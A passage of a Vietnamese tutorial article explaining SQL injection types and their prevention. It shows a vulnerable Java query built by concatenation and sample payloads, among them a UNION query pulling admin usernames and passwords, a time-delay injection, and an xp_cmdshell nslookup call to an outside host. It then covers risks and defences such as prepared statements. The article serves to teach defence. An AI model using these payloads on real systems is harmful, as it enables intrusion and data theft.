t\u00ednh n\u0103ng \u0111\u1eb7c bi\u1ec7t nh\u01b0 DNS ho\u1eb7c HTTP \u0111\u1ec3 g\u1eedi d\u1eef li\u1ec7u. Out-of-band SQLi th\u01b0\u1eddng \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng khi k\u00eanh giao ti\u1ebfp ch\u00ednh qu\u00e1 ch\u1eadm ho\u1eb7c kh\u00f4ng \u1ed5n \u0111\u1ecbnh \u0111\u1ec3 th\u1ef1c hi\u1ec7n In-band hay Inferential SQLi.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">K\u1ef9 thu\u1eadt n\u00e0y cho ph\u00e9p k\u1ebb t\u1ea5n c\u00f4ng thu th\u1eadp d\u1eef li\u1ec7u qua c\u00e1c k\u00eanh ph\u1ee5, ch\u1eb3ng h\u1ea1n th\u00f4ng qua y\u00eau c\u1ea7u DNS ho\u1eb7c HTTP.<\/span><\/p>\n<h2><span class=\"ez-toc-section\" id=\"Vi_du_ve_tung_loai_SQL_injection\"><\/span><b>V\u00ed d\u1ee5 v\u1ec1 t\u1eebng lo\u1ea1i SQL injection<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><span style=\"font-weight: 400;\">V\u00ed d\u1ee5 sau \u0111\u00e2y thu\u1ed9c x\u1eed l\u00fd c\u1ee7a ng\u00f4n ng\u1eef l\u1eadp tr\u00ecnh Java, trong \u0111\u00f3 m\u1ed9t c\u00e2u truy v\u1ea5n SQL th\u00f4ng th\u01b0\u1eddng \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng \u0111\u1ec3 l\u1ea5y th\u00f4ng tin c\u1ee7a m\u1ed9t sinh vi\u00ean d\u1ef1a tr\u00ean ID:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">String studentId = request.getParameter(\"studentId\");<\/span>\r\n\r\n<span style=\"font-weight: 400;\">String query = \"SELECT * FROM students WHERE studentId = \" + studentId;<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">N\u1ebfu ng\u01b0\u1eddi d\u00f9ng nh\u1eadp <\/span><span style=\"font-weight: 400;\">117<\/span><span style=\"font-weight: 400;\"> v\u00e0o form, truy v\u1ea5n s\u1ebd tr\u1edf th\u00e0nh:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">SELECT * FROM students WHERE studentId = 117;<\/span><\/pre>\n<p><b>K\u1ebft qu\u1ea3 \u0111\u00fang<\/b><span style=\"font-weight: 400;\">: Tr\u1ea3 v\u1ec1 th\u00f4ng tin c\u1ee7a sinh vi\u00ean c\u00f3 <\/span><span style=\"font-weight: 400;\">studentId = 117<\/span><span style=\"font-weight: 400;\">.<\/span><\/p>\n<p>C\u00e1c v\u00ed d\u1ee5 v\u1ec1 t\u1eebng lo\u1ea1i SQL Injection s\u1ebd \u0111\u01b0\u1ee3c d\u1ef1a tr\u00ean v\u00ed d\u1ee5 n\u00e0y.<\/p>\n<h3><b>In-band SQLi (C\u1ed5 \u0111i\u1ec3n)<\/b><\/h3>\n<p>Nh\u01b0 \u0111\u00e3 tr\u00ecnh b\u00e0y \u1edf tr\u00ean, lo\u1ea1i In-band SQLi c\u00f3 2 bi\u1ebfn th\u1ec3 l\u00e0: <strong>Error-based SQLi<\/strong> v\u00e0 <strong>Union-based SQLi<\/strong>.<\/p>\n<h4><b>V\u00ed d\u1ee5 Truy v\u1ea5n SQL b\u1ecb t\u1ea5n c\u00f4ng (Error-based SQLi)<\/b><\/h4>\n<p><span style=\"font-weight: 400;\">K\u1ebb t\u1ea5n c\u00f4ng nh\u1eadp v\u00e0o form:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">117'<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">Truy v\u1ea5n tr\u00ean khi x\u1eed l\u00fd s\u1ebd tr\u1edf th\u00e0nh:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">SELECT * FROM students WHERE studentId = 117';<\/span><\/pre>\n<p><span style=\"font-weight: 400;\"><strong>K\u1ebft qu\u1ea3:<\/strong> Do d\u1ea5u nh\u00e1y &#8216; kh\u00f4ng \u0111\u01b0\u1ee3c \u0111\u00f3ng, c\u01a1 s\u1edf d\u1eef li\u1ec7u s\u1ebd tr\u1ea3 v\u1ec1 l\u1ed7i. K\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 d\u1ef1a v\u00e0o nh\u1eefng th\u00f4ng tin c\u00f3 trong th\u00f4ng b\u00e1o l\u1ed7i \u0111\u1ec3 khai th\u00e1c c\u01a1 s\u1edf d\u1eef li\u1ec7u.<\/span><\/p>\n<h4><b>V\u00ed d\u1ee5 Truy v\u1ea5n SQL b\u1ecb t\u1ea5n c\u00f4ng (Union-based SQLi)<\/b><\/h4>\n<p><span style=\"font-weight: 400;\">K\u1ebb t\u1ea5n c\u00f4ng nh\u1eadp:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">117 UNION SELECT username, password FROM admin_users; --<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">Truy v\u1ea5n tr\u00ean khi x\u1eed l\u00fd s\u1ebd tr\u1edf th\u00e0nh:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">SELECT * FROM students WHERE studentId = 117 UNION SELECT username, password FROM admin_users; --;<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">Trong \u0111\u00f3:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Ph\u1ea7n <\/span><span style=\"font-weight: 400;\">UNION<\/span><span style=\"font-weight: 400;\"> cho ph\u00e9p k\u1ebft h\u1ee3p k\u1ebft qu\u1ea3 t\u1eeb b\u1ea3ng <\/span><span style=\"font-weight: 400;\">students<\/span><span style=\"font-weight: 400;\"> v\u00e0 b\u1ea3ng <\/span><span style=\"font-weight: 400;\">admin_users<\/span><span style=\"font-weight: 400;\">.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Ph\u1ea7n <\/span><span style=\"font-weight: 400;\">&#8212;<\/span><span style=\"font-weight: 400;\"> \u0111\u01b0\u1ee3c th\u00eam v\u00e0o \u0111\u1ec3 b\u1ecf qua c\u00e1c \u0111o\u1ea1n m\u00e3 ph\u00eda sau, tr\u00e1nh l\u1ed7i c\u00fa ph\u00e1p ho\u1eb7c logic kh\u00f4ng mong mu\u1ed1n.<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\"><strong>K\u1ebft qu\u1ea3:<\/strong> Th\u00f4ng tin nh\u1ea1y c\u1ea3m t\u1eeb b\u1ea3ng <\/span><span style=\"font-weight: 400;\">admin_users<\/span><span style=\"font-weight: 400;\"> \u0111\u01b0\u1ee3c tr\u1ea3 v\u1ec1 c\u00f9ng d\u1eef li\u1ec7u sinh vi\u00ean.<\/span><\/p>\n<h3><b>Inferential SQLi (M\u00f9)<\/b><\/h3>\n<p>Inferential SQLi c\u00f3 hai bi\u1ebfn th\u1ec3 l\u00e0 <strong>Boolean-based SQLi<\/strong> v\u00e0 <strong>Time-based SQLi<\/strong>.<\/p>\n<h4><b>Boolean-based SQLi<\/b><\/h4>\n<p><span style=\"font-weight: 400;\">K\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 thay \u0111\u1ed5i c\u00e2u truy v\u1ea5n th\u00e0nh m\u1ed9t \u0111i\u1ec1u ki\u1ec7n Boolean nh\u01b0 sau:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">SELECT * FROM students WHERE studentId = 117 OR 1=1;<\/span><\/pre>\n<p><span style=\"font-weight: 400;\"><strong>K\u1ebft qu\u1ea3:<\/strong> V\u00ec \u0111i\u1ec1u ki\u1ec7n <\/span><span style=\"font-weight: 400;\">1=1<\/span><span style=\"font-weight: 400;\"> lu\u00f4n \u0111\u00fang n\u00ean \u1ee9ng d\u1ee5ng s\u1ebd tr\u1ea3 v\u1ec1 th\u00f4ng tin sinh vi\u00ean.<\/span><\/p>\n<h4><b>Time-based SQLi<\/b><\/h4>\n<p><span style=\"font-weight: 400;\">K\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 thay \u0111\u1ed5i c\u00e2u truy v\u1ea5n th\u00e0nh m\u1ed9t truy v\u1ea5n y\u00eau c\u1ea7u h\u1ec7 th\u1ed1ng ph\u1ea3i \u0111\u1ee3i m\u1ed9t kho\u1ea3ng th\u1eddi gian tr\u01b0\u1edbc khi ph\u1ea3n h\u1ed3i, v\u00ed d\u1ee5 \u0111\u1ea7u v\u00e0o c\u1ee7a k\u1ebb t\u1ea5n c\u00f4ng nh\u01b0 sau:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">117'; IF (1=1) WAITFOR DELAY '00:00:10'; --<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">Truy v\u1ea5n tr\u00ean khi x\u1eed l\u00fd s\u1ebd tr\u1edf th\u00e0nh:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">SELECT * FROM students WHERE studentId = 117; IF (1=1) WAITFOR DELAY '00:00:10'; --<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">Trong \u0111\u00f3:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">V\u00ec \u0111i\u1ec1u ki\u1ec7n <\/span><span style=\"font-weight: 400;\">1=1<\/span><span style=\"font-weight: 400;\"> l\u00e0 \u0111\u00fang, h\u1ec7 th\u1ed1ng s\u1ebd th\u1ef1c thi c\u00e2u l\u1ec7nh <\/span><span style=\"font-weight: 400;\">WAITFOR DELAY &#8217;00:00:10&#8242;<\/span><span style=\"font-weight: 400;\">, l\u00e0m \u1ee9ng d\u1ee5ng ph\u1ea3i ch\u1edd 10 gi\u00e2y tr\u01b0\u1edbc khi ph\u1ea3n h\u1ed3i.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">K\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 thay \u0111\u1ed5i \u0111i\u1ec1u ki\u1ec7n th\u00e0nh <\/span><span style=\"font-weight: 400;\">1=0<\/span><span style=\"font-weight: 400;\"> \u0111\u1ec3 x\u00e1c minh s\u1ef1 kh\u00e1c bi\u1ec7t v\u1ec1 th\u1eddi gian ph\u1ea3n h\u1ed3i.<\/span><\/li>\n<\/ul>\n<p><b>K\u1ebft qu\u1ea3<\/b><span style=\"font-weight: 400;\">: D\u1ef1a v\u00e0o s\u1ef1 ch\u1eadm tr\u1ec5 trong ph\u1ea3n h\u1ed3i, k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 suy lu\u1eadn r\u1eb1ng c\u1ea5u tr\u00fac c\u01a1 s\u1edf d\u1eef li\u1ec7u \u0111\u00e3 b\u1ecb thao t\u00e1c ho\u1eb7c \u0111i\u1ec1u ki\u1ec7n SQL \u0111\u00e3 th\u1ef1c thi th\u00e0nh c\u00f4ng.<\/span><\/p>\n<h3><b>Out-of-band SQLi<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">K\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 ch\u00e8n m\u00e3 \u0111\u1ec3 g\u1eedi d\u1eef li\u1ec7u t\u1edbi m\u00e1y ch\u1ee7 c\u1ee7a h\u1ecd, thay v\u00ec nh\u1eadn tr\u1ef1c ti\u1ebfp ph\u1ea3n h\u1ed3i t\u1eeb c\u01a1 s\u1edf d\u1eef li\u1ec7u nh\u01b0 sau:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">SELECT * FROM students WHERE studentId = 117; EXEC xp_cmdshell('nslookup example.com'); --;<\/span><\/pre>\n<p><span style=\"font-weight: 400;\"><strong>K\u1ebft qu\u1ea3:<\/strong> C\u00e2u truy v\u1ea5n n\u00e0y s\u1ebd k\u00edch ho\u1ea1t l\u1ec7nh <\/span><span style=\"font-weight: 400;\">nslookup<\/span><span style=\"font-weight: 400;\"> tr\u00ean m\u00e1y ch\u1ee7 c\u01a1 s\u1edf d\u1eef li\u1ec7u, t\u00ecm ki\u1ebfm th\u00f4ng tin DNS c\u1ee7a <\/span><span style=\"font-weight: 400;\">example.com<\/span><span style=\"font-weight: 400;\"> v\u00e0 g\u1eedi k\u1ebft qu\u1ea3 v\u1ec1 m\u00e1y ch\u1ee7 c\u1ee7a k\u1ebb t\u1ea5n c\u00f4ng. K\u1ebb t\u1ea5n c\u00f4ng s\u1ebd nh\u1eadn \u0111\u01b0\u1ee3c k\u1ebft qu\u1ea3 m\u00e0 kh\u00f4ng c\u1ea7n c\u00f3 s\u1ef1 ph\u1ea3n h\u1ed3i tr\u1ef1c ti\u1ebfp t\u1eeb c\u01a1 s\u1edf d\u1eef li\u1ec7u.<\/span><\/p>\n<h2><span class=\"ez-toc-section\" id=\"Nguy_co_va_hau_qua_cua_SQL_Injection\"><\/span><b>Nguy c\u01a1 v\u00e0 h\u1eadu qu\u1ea3 c\u1ee7a SQL Injection<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><b>C\u00e1c nguy c\u01a1 ch\u00ednh c\u1ee7a SQL Injection<\/b><\/h3>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Gi\u1ea3 m\u1ea1o danh t\u00ednh<\/b><span style=\"font-weight: 400;\">: K\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 t\u1ea1o ra truy v\u1ea5n \u0111\u1ec3 truy c\u1eadp h\u1ec7 th\u1ed1ng v\u1edbi quy\u1ec1n c\u1ee7a ng\u01b0\u1eddi d\u00f9ng kh\u00e1c ho\u1eb7c th\u1eadm ch\u00ed l\u00e0 quy\u1ec1n qu\u1ea3n tr\u1ecb vi\u00ean.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Thao t\u00fang d\u1eef li\u1ec7u<\/b><span style=\"font-weight: 400;\">: SQL Injection cho ph\u00e9p k\u1ebb t\u1ea5n c\u00f4ng thay \u0111\u1ed5i, x\u00f3a ho\u1eb7c th\u00eam m\u1edbi c\u00e1c d\u1eef li\u1ec7u trong c\u01a1 s\u1edf d\u1eef li\u1ec7u, g\u00e2y thi\u1ec7t h\u1ea1i l\u1edbn cho h\u1ec7 th\u1ed1ng v\u00e0 ng\u01b0\u1eddi d\u00f9ng.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>L\u00e0m sai l\u1ec7ch giao d\u1ecbch<\/b><span style=\"font-weight: 400;\">: C\u00e1c t\u1ea5n c\u00f4ng SQLi c\u00f3 th\u1ec3 khi\u1ebfn c\u00e1c giao d\u1ecbch b\u1ecb h\u1ee7y b\u1ecf ho\u1eb7c thay \u0111\u1ed5i s\u1ed1 d\u01b0 t\u00e0i kho\u1ea3n, d\u1eabn \u0111\u1ebfn c\u00e1c v\u1ea5n \u0111\u1ec1 nghi\u00eam tr\u1ecdng v\u1ec1 x\u00e1c th\u1ef1c v\u00e0 s\u1ef1 tin c\u1eady c\u1ee7a h\u1ec7 th\u1ed1ng.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>R\u00f2 r\u1ec9 d\u1eef li\u1ec7u<\/b><span style=\"font-weight: 400;\">: SQLi c\u00f3 th\u1ec3 gi\u00fap k\u1ebb t\u1ea5n c\u00f4ng l\u1ea5y c\u1eafp to\u00e0n b\u1ed9 d\u1eef li\u1ec7u t\u1eeb c\u01a1 s\u1edf d\u1eef li\u1ec7u, t\u1eeb th\u00f4ng tin ng\u01b0\u1eddi d\u00f9ng \u0111\u1ebfn th\u00f4ng tin nh\u1ea1y c\u1ea3m.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>X\u00f3a ho\u1eb7c l\u00e0m gi\u00e1n \u0111o\u1ea1n d\u1eef li\u1ec7u<\/b><span style=\"font-weight: 400;\">: K\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 x\u00f3a ho\u1eb7c thay \u0111\u1ed5i d\u1eef li\u1ec7u quan tr\u1ecdng, khi\u1ebfn h\u1ec7 th\u1ed1ng kh\u00f4ng th\u1ec3 ho\u1ea1t \u0111\u1ed9ng b\u00ecnh th\u01b0\u1eddng.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Chi\u1ebfm quy\u1ec1n qu\u1ea3n tr\u1ecb c\u01a1 s\u1edf d\u1eef li\u1ec7u<\/b><span style=\"font-weight: 400;\">: N\u1ebfu th\u00e0nh c\u00f4ng, k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 tr\u1edf th\u00e0nh qu\u1ea3n tr\u1ecb vi\u00ean c\u1ee7a c\u01a1 s\u1edf d\u1eef li\u1ec7u v\u00e0 to\u00e0n quy\u1ec1n \u0111i\u1ec1u khi\u1ec3n h\u1ec7 th\u1ed1ng.<\/span><\/li>\n<\/ul>\n<h3><b>H\u1eadu qu\u1ea3 c\u1ee7a SQL Injection<\/b><\/h3>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Thi\u1ec7t h\u1ea1i v\u1ec1 t\u00e0i ch\u00ednh<\/b><span style=\"font-weight: 400;\">: C\u00e1c t\u1ed5n th\u1ea5t do SQL Injection c\u00f3 th\u1ec3 r\u1ea5t l\u1edbn, bao g\u1ed3m chi ph\u00ed s\u1eeda ch\u1eefa, kh\u00f4i ph\u1ee5c d\u1eef li\u1ec7u, v\u00e0 m\u1ea5t uy t\u00edn.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>M\u1ea5t l\u00f2ng tin t\u1eeb ng\u01b0\u1eddi d\u00f9ng<\/b><span style=\"font-weight: 400;\">: Khi th\u00f4ng tin c\u00e1 nh\u00e2n ho\u1eb7c d\u1eef li\u1ec7u nh\u1ea1y c\u1ea3m b\u1ecb r\u00f2 r\u1ec9, kh\u00e1ch h\u00e0ng v\u00e0 ng\u01b0\u1eddi d\u00f9ng s\u1ebd m\u1ea5t ni\u1ec1m tin v\u00e0o h\u1ec7 th\u1ed1ng.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>H\u01b0 h\u1ea1i h\u1ec7 th\u1ed1ng<\/b><span style=\"font-weight: 400;\">: Vi\u1ec7c h\u1ec7 th\u1ed1ng b\u1ecb x\u00e2m nh\u1eadp v\u00e0 thay \u0111\u1ed5i d\u1eef li\u1ec7u c\u00f3 th\u1ec3 l\u00e0m gi\u00e1n \u0111o\u1ea1n ho\u1ea1t \u0111\u1ed9ng c\u1ee7a \u1ee9ng d\u1ee5ng ho\u1eb7c l\u00e0m m\u1ea5t ho\u00e0n to\u00e0n d\u1eef li\u1ec7u quan tr\u1ecdng.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>M\u1ea5t l\u1ee3i th\u1ebf c\u1ea1nh tranh<\/b><span style=\"font-weight: 400;\">: K\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 l\u1ea5y c\u1eafp d\u1eef li\u1ec7u kinh doanh, l\u00e0m r\u00f2 r\u1ec9 th\u00f4ng tin n\u1ed9i b\u1ed9, \u1ea3nh h\u01b0\u1edfng \u0111\u1ebfn chi\u1ebfn l\u01b0\u1ee3c v\u00e0 ho\u1ea1t \u0111\u1ed9ng c\u1ee7a doanh nghi\u1ec7p.<\/span><\/li>\n<\/ul>\n<h2><span class=\"ez-toc-section\" id=\"Cach_phong_chong_SQL_Injection\"><\/span><b>C\u00e1ch ph\u00f2ng ch\u1ed1ng SQL Injection<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><span style=\"font-weight: 400;\">SQL Injection l\u00e0 m\u1ed9t l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt nghi\u00eam tr\u1ecdng, c\u00f3 th\u1ec3 g\u00e2y r\u1ee7i ro l\u1edbn cho c\u01a1 s\u1edf d\u1eef li\u1ec7u c\u1ee7a \u1ee9ng d\u1ee5ng web. \u0110\u1ec3 b\u1ea3o v\u1ec7 h\u1ec7 th\u1ed1ng kh\u1ecfi c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng n\u00e0y, d\u01b0\u1edbi \u0111\u00e2y l\u00e0 m\u1ed9t s\u1ed1 ph\u01b0\u01a1ng ph\u00e1p ph\u1ed5 bi\u1ebfn nh\u01b0 sau:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>S\u1eed d\u1ee5ng Prepared Statements (Parameterized Queries): <\/b><span style=\"font-weight: 400;\">\u0110\u00e2y l\u00e0 c\u00e1ch ph\u1ed5 bi\u1ebfn nh\u1ea5t \u0111\u1ec3 ng\u0103n ng\u1eeba SQL Injection, b\u1eb1ng c\u00e1ch ph\u00e2n t\u00e1ch r\u00f5 r\u00e0ng gi\u1eefa d\u1eef li\u1ec7u \u0111\u1ea7u v\u00e0o v\u00e0 c\u00e2u l\u1ec7nh SQL. C\u00e1c c\u00e2u l\u1ec7nh SQL \u0111\u01b0\u1ee3c \u0111\u1ecbnh ngh\u0129a tr\u01b0\u1edbc, sau \u0111\u00f3 ch\u1ec9 nh\u1eadn c\u00e1c tham s\u1ed1 c\u1ee5 th\u1ec3. C\u00e1ch n\u00e0y \u0111\u1ea3m b\u1ea3o r\u1eb1ng d\u1eef li\u1ec7u ng\u01b0\u1eddi d\u00f9ng kh\u00f4ng bao gi\u1edd b\u1ecb hi\u1ec3u l\u00e0 m\u00e3 l\u1ec7nh SQL. C\u00e1c th\u01b0 vi\u1ec7n ORM (Object-Relational Mapping) hi\u1ec7n \u0111\u1ea1i th\u01b0\u1eddng t\u1ef1 \u0111\u1ed9ng th\u1ef1c hi\u1ec7n \u0111i\u1ec1u n\u00e0y, gi\u00fap \u0111\u01a1n gi\u1ea3n h\u00f3a quy tr\u00ecnh.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Kh\u00f4ng tin t\u01b0\u1edfng v\u00e0o b\u1ea5t k\u1ef3 d\u1eef li\u1ec7u \u0111\u1ea7u v\u00e0o n\u00e0o<\/b><span style=\"font-weight: 400;\">: M\u1ecdi d\u1eef li\u1ec7u \u0111\u1ea7u v\u00e0o t\u1eeb ng\u01b0\u1eddi d\u00f9ng c\u1ea7n \u0111\u01b0\u1ee3c xem l\u00e0 kh\u00f4ng tin c\u1eady. D\u00f9 l\u00e0 ng\u01b0\u1eddi d\u00f9ng n\u1ed9i b\u1ed9 hay ng\u01b0\u1eddi d\u00f9ng c\u00f4ng khai, b\u1ea5t k\u1ef3 \u0111\u1ea7u v\u00e0o n\u00e0o \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng trong c\u00e2u truy v\u1ea5n SQL \u0111\u1ec1u c\u00f3 nguy c\u01a1 ti\u1ec1m \u1ea9n SQL Injection. Do \u0111\u00f3, t\u1ea5t c\u1ea3 d\u1eef li\u1ec7u \u0111\u1ea7u v\u00e0o c\u1ea7n \u0111\u01b0\u1ee3c ki\u1ec3m tra v\u00e0 x\u1eed l\u00fd c\u1ea9n th\u1eadn.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Escaping d\u1eef li\u1ec7u \u0111\u1ea7u v\u00e0o: <\/b><span style=\"font-weight: 400;\">Khi nh\u1eadn d\u1eef li\u1ec7u t\u1eeb ng\u01b0\u1eddi d\u00f9ng, c\u1ea7n tho\u00e1t (escape) c\u00e1c k\u00fd t\u1ef1 \u0111\u1eb7c bi\u1ec7t nh\u01b0 <\/span><span style=\"font-weight: 400;\">&#8216;<\/span><span style=\"font-weight: 400;\">, <\/span><span style=\"font-weight: 400;\">&#8220;<\/span><span style=\"font-weight: 400;\">, <\/span><span style=\"font-weight: 400;\">;<\/span><span style=\"font-weight: 400;\">, ho\u1eb7c <\/span><span style=\"font-weight: 400;\">&#8212;<\/span><span style=\"font-weight: 400;\"> \u0111\u1ec3 ng\u0103n ch\u1eb7n ch\u00fang \u0111\u01b0\u1ee3c x\u1eed l\u00fd nh\u01b0 m\u00e3 l\u1ec7nh. Gi\u00fap \u0111\u1ea3m b\u1ea3o r\u1eb1ng c\u01a1 s\u1edf d\u1eef li\u1ec7u s\u1ebd xem c\u00e1c k\u00fd t\u1ef1 n\u00e0y l\u00e0 d\u1eef li\u1ec7u th\u00f4ng th\u01b0\u1eddng, kh\u00f4ng ph\u1ea3i l\u00e0 c\u00e1c \u0111i\u1ec1u ki\u1ec7n ho\u1eb7c l\u1ec7nh SQL.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>S\u1eed d\u1ee5ng Stored Procedures: <\/b><span style=\"font-weight: 400;\">D\u00f9 kh\u00f4ng ph\u1ea3i l\u00e0 m\u1ed9t chi\u1ebfn l\u01b0\u1ee3c b\u1ea3o m\u1eadt m\u1ea1nh m\u1ebd duy nh\u1ea5t, nh\u01b0ng \u00e1p d\u1ee5ng\u00a0<a href=\"https:\/\/itviec.com\/blog\/thu-tuc-trong-sql\/\" target=\"_blank\" rel=\"noopener\">th\u1ee7 t\u1ee5c l\u01b0u tr\u1eef trong SQL<\/a> c\u00f3 th\u1ec3 gi\u00fap gi\u1ea3m thi\u1ec3u r\u1ee7i ro SQLi. Stored Procedures cho ph\u00e9p th\u1ef1c thi c\u00e1c truy v\u1ea5n SQL \u0111\u01b0\u1ee3c \u0111\u1ecbnh ngh\u0129a tr\u01b0\u1edbc trong c\u01a1 s\u1edf d\u1eef li\u1ec7u. Khi k\u1ebft h\u1ee3p v\u1edbi vi\u1ec7c gi\u1edbi h\u1ea1n quy\u1ec1n h\u1ea1n c\u00e1c t\u00e0i kho\u1ea3n c\u01a1 s\u1edf d\u1eef li\u1ec7u v\u00e0 c\u00f3 th\u1ec3 ki\u1ec3m tra ki\u1ec3u d\u1eef li\u1ec7u \u0111\u1ea7u v\u00e0o, t\u1eeb \u0111\u00f3 ng\u0103n ng\u1eeba vi\u1ec7c nh\u1eadp d\u1eef li\u1ec7u sai ki\u1ec3u, thi\u1ec3u r\u1ee7i ro do SQL Injection.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>S\u1eed d\u1ee5ng Web Application Firewall (WAF)<\/b><span style=\"font-weight: 400;\">: WAF l\u00e0 m\u1ed9t ph\u1ea7n quan tr\u1ecdng trong gi\u1ea3i ph\u00e1p b\u1ea3o m\u1eadt to\u00e0n di\u1ec7n, gi\u00fap ph\u00e1t hi\u1ec7n SQL Injection c\u00f9ng c\u00e1c m\u1ed1i \u0111e d\u1ecda kh\u00e1c. WAF ho\u1ea1t \u0111\u1ed9ng d\u1ef1a tr\u00ean danh s\u00e1ch ch\u1eef k\u00fd (signatures) \u0111\u01b0\u1ee3c c\u1eadp nh\u1eadt li\u00ean t\u1ee5c, gi\u00fap x\u00e1c \u0111\u1ecbnh v\u00e0 lo\u1ea1i b\u1ecf ch\u00ednh x\u00e1c c\u00e1c truy v\u1ea5n SQL \u0111\u1ed9c h\u1ea1i.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Tu\u00e2n th\u1ee7 nguy\u00ean t\u1eafc &#8220;\u00cdt quy\u1ec1n nh\u1ea5t&#8221; (Least Privilege)<\/b><span style=\"font-weight: 400;\">: C\u1ea7n h\u1ea1n ch\u1ebf quy\u1ec1n truy c\u1eadp c\u01a1 s\u1edf d\u1eef li\u1ec7u cho c\u00e1c t\u00e0i kho\u1ea3n ch\u1ec9 c\u00f3 quy\u1ec1n c\u1ea7n thi\u1ebft \u0111\u1ec3 th\u1ef1c hi\u1ec7n truy v\u1ea5n SQL. \u0110i\u1ec1u n\u00e0y gi\u00fap gi\u1ea3m thi\u1ec3u r\u1ee7i ro n\u1ebfu k\u1ebb t\u1ea5n c\u00f4ng chi\u1ebfm quy\u1ec1n truy c\u1eadp v\u00e0o h\u1ec7 th\u1ed1ng.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>\u0110\u00e0o t\u1ea1o v\u00e0 n\u00e2ng cao nh\u1eadn th\u1ee9c<\/b><span style=\"font-weight: 400;\">: T\u1ea5t c\u1ea3 nh\u1eefng ng\u01b0\u1eddi tham gia x\u00e2y d\u1ef1ng \u1ee9ng d\u1ee5ng (nh\u01b0 l\u1eadp tr\u00ecnh vi\u00ean, nh\u00e2n vi\u00ean ki\u1ec3m th\u1eed, DevOps, SysAdmin) c\u1ea7n \u0111\u01b0\u1ee3c \u0111\u00e0o t\u1ea1o v\u1ec1 c\u00e1c r\u1ee7i ro b\u1ea3o m\u1eadt, bao g\u1ed3m SQL Injection. Nh\u1eadn th\u1ee9c \u0111\u00fang v\u1ec1 v\u1ea5n \u0111\u1ec1 s\u1ebd gi\u00fap gi\u1ea3m thi\u1ec3u nguy c\u01a1 l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt xu\u1ea5t hi\u1ec7n trong s\u1ea3n ph\u1ea9m.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>S\u1eed d\u1ee5ng c\u00e1c c\u00f4ng c\u1ee5 ph\u00e1t hi\u1ec7n l\u1ed7 h\u1ed5ng<\/b><span style=\"font-weight: 400;\">: SQLi c\u00f3 th\u1ec3 xu\u1ea5t hi\u1ec7n do l\u1ed7i c\u1ee7a l\u1eadp tr\u00ecnh vi\u00ean ho\u1eb7c qua c\u00e1c th\u01b0 vi\u1ec7n\/ m\u00f4-\u0111un b\u00ean ngo\u00e0i. V\u00ec v\u1eady, vi\u1ec7c qu\u00e9t \u1ee9ng d\u1ee5ng web \u0111\u1ecbnh k\u1ef3 v\u1edbi c\u00f4ng c\u1ee5 nh\u01b0 Acunetix l\u00e0 r\u1ea5t c\u1ea7n 